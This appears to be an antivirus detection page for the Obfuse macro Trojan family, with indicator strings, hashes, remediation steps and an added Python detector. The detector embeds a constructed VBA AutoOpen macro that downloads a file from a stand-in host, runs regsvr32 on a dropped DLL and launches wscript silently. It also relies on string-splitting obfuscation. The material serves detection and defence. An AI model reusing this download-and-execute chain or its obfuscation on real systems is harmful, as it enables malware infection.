Concrete signature match: Trojan (appears legitimate but performs malicious actions), JavaScript platform, family Obfuse
This detection covers an obfuscated JavaScript Trojan identified through concrete behavioral analysis. Infection typically starts from a macro-enabled Office document: the macro downloads additional payloads over HTTP (the `.Open "GET"` / `.responsebody` fragments below), drops them under c:\programdata\ and the user's Documents folder, establishes persistence by modifying system files and Word templates (the NORMAL1.DOT save seen in the strings), and silently executes commands through the WScript.Shell COM object and living-off-the-land binaries such as wscript.exe (launched with //b to suppress dialogs), mshta.exe, regsvr32.exe and rundll32.exe. The string-splitting visible in the fragments (for example `+ "cript.shell")` and `(0) + "vr32 ...`) is what defeats naive substring matching and is the reason the family is tagged Obfuse. The PE-side string codes additionally point to PowerShell, BITS jobs, scheduled tasks, a netsh helper DLL, API hooking, data encoding, remote file copy and file deletion, which should guide the persistence review during remediation.
Relevant strings associated with this threat:
- .VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoOpen" (MACROHSTR_EXT)
- .SaveAs (GetPath$ + "NORMAL1.DOT") (MACROHSTR_EXT)
- + "cript.shell") (MACROHSTR_EXT)
- String = "c:\programdata\ (MACROHSTR_EXT)
- (0) + "vr32 c:\programdata\ (MACROHSTR_EXT)
- .txt", "ws" (MACROHSTR_EXT)
- .pdf", "ws" (MACROHSTR_EXT)
- .Open "GET (MACROHSTR_EXT)
- .responsebody (MACROHSTR_EXT)
- = CreateObject("WScript.Shell") (MACROHSTR_EXT)
- = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- (Environ("USERPROFILE") + "\Documents\" + "qX2xpJ5V.txt") Then (MACROHSTR_EXT)
- mp4klgzo.CreateFolder (pacbhdvc) (MACROHSTR_EXT)
- = q87fpor4.Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False) (MACROHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Hashes associated with this detection (four 64-hex-digit values as they appear on the page, presumably SHA-256; listed as-is):
- 743ee294d9419a39cb0d15ad32ced4d3d78886eb98e34a39bfea2856b51b8295
- 22c82e599efee60dfcc61674e315922cafe2a44fce11f67bbc97754bcb664ee9
- 3a3a7bf17331c8f6faa3b0dfb109cda4154f0a999f0b27a293e29439c10a94ee
- d320aba8582e9d6f494bc7f49b954e904fac0b71bd499e801c7d9f7524ffda53

Remediation: isolate the affected host immediately. Perform a full system scan to ensure all malicious components are removed. Review process-creation and script-host logs for wscript.exe //b, mshta.exe, regsvr32.exe and rundll32.exe launched from an Office process, and check the persistence mechanisms the strings point to: modified Word templates (NORMAL1.DOT), scheduled tasks, BITS jobs, netsh helper DLL registrations, and dropped files under c:\programdata\ and %USERPROFILE%\Documents. Block any identified command-and-control (C2) domains or IPs at the network perimeter.
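As an added example (not part of this detection page or of any vendor signature engine), the following Python script shows how the macro-side indicators listed above can be turned into detection logic. It first folds the string-splitting and Chr() tricks visible in the fragments (`+ "cript.shell")`, `(0) + "vr32 ...`) so that the full COM class name and LOLBin name become visible, then matches a set of regexes derived from the listed strings. The VBA sample, the indicator names and the four-indicator threshold are constructed for this example.

```python
import re

# Constructed VBA fragment for this example (not a real sample). It mirrors the
# fragment style of the indicator strings above: string splitting and Chr()
# hide the COM class and the LOLBin name from naive substring matching.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim q87fpor4, mp4klgzo, pacbhdvc, qs, h
    Set q87fpor4 = CreateObject("WS" + "cript.shell")
    Set mp4klgzo = CreateObject("Scripting.FileSystemObject")
    pacbhdvc = "c:\programdata\" + Chr(113) + Chr(88)
    mp4klgzo.CreateFolder (pacbhdvc)
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/" + "a.pdf", False
    h.send
    qs = Environ("USERPROFILE") + "\Documents\" + "qX2xpJ5V.txt"
    q87fpor4.Run "regs" + Chr(118) + "r32 " + pacbhdvc + "\x.dll", 0
    r = q87fpor4.Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False)
    ActiveDocument.SaveAs (GetPath$ + "NORMAL1.DOT")
End Sub
'''

CHR_RE = re.compile(r'Chr\((\d+)\)')
CONCAT_RE = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


def fold_strings(vba):
    """Resolve Chr(n) to its character and join adjacent "a" + "b" literals.

    Chr(34) (a double quote) is deliberately left alone: folding it would
    break the literal boundaries this regex-based folder relies on.
    """
    def chr_literal(m):
        n = int(m.group(1))
        if not 0 <= n < 256:
            return m.group(0)
        c = chr(n)
        return m.group(0) if c == '"' else '"' + c + '"'

    text = CHR_RE.sub(chr_literal, vba)
    prev = None
    while prev != text:  # repeat until no adjacent literals remain
        prev = text
        text = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
    return text


# Patterns derived from the macro strings listed on this page (hypothetical names).
INDICATORS = {
    "autoopen_entry":     r'\bAutoOpen\b',
    "wscript_shell":      r'CreateObject\("WScript\.Shell"\)',
    "fso":                r'CreateObject\("Scripting\.FileSystemObject"\)',
    "programdata_drop":   r'c:\\programdata\\',
    "regsvr32_exec":      r'\bregsvr32\b',
    "wscript_silent":     r'\.Run\("wscript\.exe //b ',
    "normal_dot_save":    r'\.SaveAs \(GetPath\$ \+ "NORMAL1\.DOT"\)',
    "http_download":      r'\.Open "GET',
    "userprofile_marker": r'Environ\("USERPROFILE"\) \+ "\\Documents\\',
}


def scan_macro(vba, fold=True):
    """Return the sorted indicator names that match the (optionally folded) macro."""
    text = fold_strings(vba) if fold else vba
    return sorted(name for name, pat in INDICATORS.items()
                  if re.search(pat, text, re.IGNORECASE))


def verdict(vba, threshold=4):
    """Crude triage: several co-occurring indicators -> treat as this family."""
    hits = scan_macro(vba)
    return ("suspicious" if len(hits) >= threshold else "clean", hits)


if __name__ == "__main__":
    print("raw   :", scan_macro(SAMPLE_MACRO, fold=False))
    print("folded:", scan_macro(SAMPLE_MACRO, fold=True))
    print(verdict(SAMPLE_MACRO))
```

Running the script prints the indicator set twice: without folding, the `wscript_shell` and `regsvr32_exec` patterns never fire because the names only exist as split literals; after folding they do, which is exactly the gap the Obfuse-style fragments exploit. The folder is intentionally minimal (no Mid/StrReverse, no variable tracking), so it will miss more aggressive obfuscation; on real documents the VBA text would first be extracted with a tool such as olevba before being fed to `scan_macro`.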